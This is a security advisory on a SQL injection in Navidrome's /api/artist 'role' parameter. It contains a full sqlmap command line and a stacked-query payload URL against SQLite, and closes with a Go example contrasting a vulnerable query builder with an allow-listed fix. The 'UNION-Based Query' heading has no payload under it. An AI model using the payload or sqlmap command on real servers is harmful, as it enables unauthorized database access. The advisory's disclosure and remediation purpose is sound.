CVE-2025-48949: Navidrome allows SQL Injection via role parameter
🛡 <strong>Security Advisory: SQL Injection Vulnerability in Navidrome v0.55.2</strong>
<strong>Overview</strong>
This vulnerability arises because the value of the role query parameter of the API endpoint /api/artist is placed into a SQL statement without being validated or bound as a parameter. An attacker who controls that value can append arbitrary SQL to the query, potentially gaining unauthorized access to the backend database and compromising sensitive user information.
<strong>Details</strong>
Vulnerable Component: API endpoint /api/artist
Parameter: role
Vulnerability Type: SQL Injection (stacked queries, UNION queries)
Database Affected: SQLite (confirmed exploitation via SQLite-specific payloads)
Impact: Successful exploitation allows an unauthenticated attacker to:
- Execute arbitrary SQL commands
- Extract or manipulate sensitive data (e.g., user records, playlists)
- Potentially escalate privileges or disrupt service availability
<strong>Proof of Concept (PoC)</strong>
Example sqlmap invocation (navi is a file holding the captured HTTP request to /api/artist, read with -r; --tamper charencode URL-encodes every character of the payload; --dbms sqlite restricts sqlmap to SQLite-specific techniques):
sqlmap.py -r navi --level 5 --risk 3 -a --banner --batch --tamper charencode --dbms sqlite
Sample Payloads:
Stacked Queries:
http://navidrome/api/artist?_end=15&_order=ASC&_sort=name&_start=0&role=albumartist');SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))--
The leading ') closes the string literal and the parenthesised expression the role value is interpolated into, the ; starts a second statement, and the trailing -- comments out the remainder of the original query. The second statement is sqlmap's SQLite "heavy query" probe: upper-casing the hex encoding of a 250 MB random blob takes measurable time, so a delayed response confirms that stacked statements execute. When reviewing access logs, a role parameter containing a quote, a semicolon or RANDOMBLOB is a direct indicator of this attack.
UNION-Based Query:
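The following Go program is an added example and is not Navidrome's code. It reconstructs the vulnerable pattern in the shape the advisory's payload implies (the role value is formatted into a quoted, parenthesised SQLite expression; the json_extract form and the role allow-list are assumptions) and sets the advisory's stacked-query payload against both the string-built query and a hardened builder that allow-lists the role and binds the derived value as a parameter.

```go
package main

import (
	"fmt"
	"strings"
)

// Roles the endpoint is meant to accept. Assumed list for this example;
// the real set is defined by Navidrome, not by this file.
var allowedRoles = map[string]bool{
	"artist":      true,
	"albumartist": true,
	"composer":    true,
	"conductor":   true,
	"lyricist":    true,
	"performer":   true,
}

// Value of the role parameter taken from the advisory's stacked-query PoC.
const advisoryPayload = "albumartist');SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))--"

// buildArtistQueryUnsafe reproduces the vulnerable pattern: the untrusted
// role is formatted straight into the SQL text. The json_extract shape is an
// assumption chosen so that the payload's leading "')" closes both the string
// literal and the function call, exactly as the PoC requires.
func buildArtistQueryUnsafe(role string) string {
	return fmt.Sprintf(
		"SELECT id, name FROM artist WHERE json_extract(stats, '$.%s') IS NOT NULL",
		role)
}

// buildArtistQuerySafe rejects any role outside the allow-list and still binds
// the derived JSON path as a parameter, so no caller-controlled byte ever
// becomes part of the SQL text.
func buildArtistQuerySafe(role string) (string, []any, error) {
	if !allowedRoles[role] {
		return "", nil, fmt.Errorf("unsupported role %q", role)
	}
	return "SELECT id, name FROM artist WHERE json_extract(stats, ?) IS NOT NULL",
		[]any{"$." + role}, nil
}

// statementCount gives a rough count of top-level statements in generated SQL
// by splitting on semicolons; anything above one means a stacked query got in.
func statementCount(sql string) int {
	n := 0
	for _, part := range strings.Split(sql, ";") {
		if strings.TrimSpace(part) != "" {
			n++
		}
	}
	return n
}

func main() {
	unsafe := buildArtistQueryUnsafe(advisoryPayload)
	fmt.Printf("unsafe SQL (%d statements):\n%s\n\n", statementCount(unsafe), unsafe)

	if _, _, err := buildArtistQuerySafe(advisoryPayload); err != nil {
		fmt.Println("safe builder rejected payload:", err)
	}
	q, args, _ := buildArtistQuerySafe("albumartist")
	fmt.Printf("safe SQL: %s  args=%v\n", q, args)
}
```

The allow-list is the essential part of the fix: the role lands in a position (a JSON path inside a function argument) where a value that is only escaped would still let an attacker pick arbitrary paths, whereas a closed set of known roles leaves nothing to inject. Binding the derived path as a parameter on top of that is cheap insurance if the set of roles is later extended.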